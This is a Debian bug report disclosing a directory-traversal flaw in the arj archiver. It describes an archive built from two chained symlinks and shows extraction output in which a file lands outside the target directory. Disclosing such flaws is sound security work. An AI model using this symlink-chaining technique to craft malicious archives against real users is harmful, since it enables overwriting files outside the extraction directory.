Bug#867520: arj: directory traversal via two symlinks

Jakub Wilk Thu, 06 Jul 2017 17:45:36 -0700

Package: arj
Version: 3.10.22-15
Tags: security

The attached archive contains two symlinks and a regular file:


   cur -> .
   par -> cur/..
   par/moo

This setup defeats ARJ's directory traversal protections:

   $ ls ../moo
   /bin/ls: cannot access '../moo': No such file or directory

   $ arj x traversal-dirsymlink2.arj
   ARJ32 v 3.10, Copyright (c) 1998-2004, ARJ Software Russia. [04 Jun 2016]

   Processing archive: traversal-dirsymlink2.arj
   Archive created: 2017-07-06 22:51:02, modified: 2017-07-06 22:51:02
   Extracting cur                         (SymLink) OK
   Extracting par                         (SymLink) OK
   Extracting par/moo                     OK
        3 file(s)

   $ ls ../moo
   ../moo

--
Jakub Wilk

traversal-dirsymlink2.arj
Description: Binary data

Bug#867520: arj: directory traversal via two symlinks

Reply via email to